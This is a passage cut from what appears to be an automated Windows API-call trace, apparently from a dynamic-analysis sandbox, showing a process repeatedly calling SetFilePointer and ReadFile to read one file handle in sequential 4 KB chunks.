lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.263] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x10c000 [0081.263] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.263] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x10d000 [0081.263] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.264] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x10e000 [0081.264] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.264] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x10f000 [0081.264] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.265] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x110000 [0081.265] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.266] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x111000 [0081.266] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.266] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x112000 [0081.266] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.267] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x113000 [0081.267] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.267] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x114000 [0081.267] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.268] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x115000 [0081.268] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.268] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x116000 [0081.268] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.268] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x117000 [0081.269] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.270] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x118000 [0081.270] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.270] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x119000 [0081.270] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.271] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x11a000 [0081.271] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.271] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x11b000 [0081.271] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.272] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x11c000 [0081.272] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.272] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x11d000 [0081.272] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.273] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x11e000 [0081.273] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.273] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x11f000 [0081.273] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.274] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x120000 [0081.274] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.274] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x121000 [0081.274] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.276] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x122000 [0081.276] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.276] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x123000 [0081.276] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.277] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x124000 [0081.277] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.277] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x125000 [0081.277] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.278] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x126000 [0081.278] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.278] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x127000 [0081.278] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.278] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x128000 [0081.279] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.280] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x129000 [0081.280] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.280] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x12a000 [0081.280] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.281] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x12b000 [0081.281] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.281] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x12c000 [0081.281] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.282] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x12d000 [0081.282] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.282] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x12e000 [0081.282] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.282] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x12f000 [0081.282] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.283] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x130000 [0081.283] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.284] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x131000 [0081.284] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.284] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x132000 [0081.284] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.285] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x133000 [0081.285] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.285] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x134000 [0081.285] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.285] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x135000 [0081.286] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.286] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x136000 [0081.286] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.286] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x137000 [0081.286] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.286] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x138000 [0081.287] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.288] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x139000 [0081.288] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.288] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x13a000 [0081.288] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.289] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x13b000 [0081.289] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.289] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x13c000 [0081.289] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.289] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x13d000 [0081.289] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.290] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x13e000 [0081.290] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.290] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x13f000 [0081.290] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.290] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x140000 [0081.290] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.293] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x141000 [0081.293] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.293] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x142000 [0081.293] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.294] SetFilePointer (in: hFile=0x4bc, 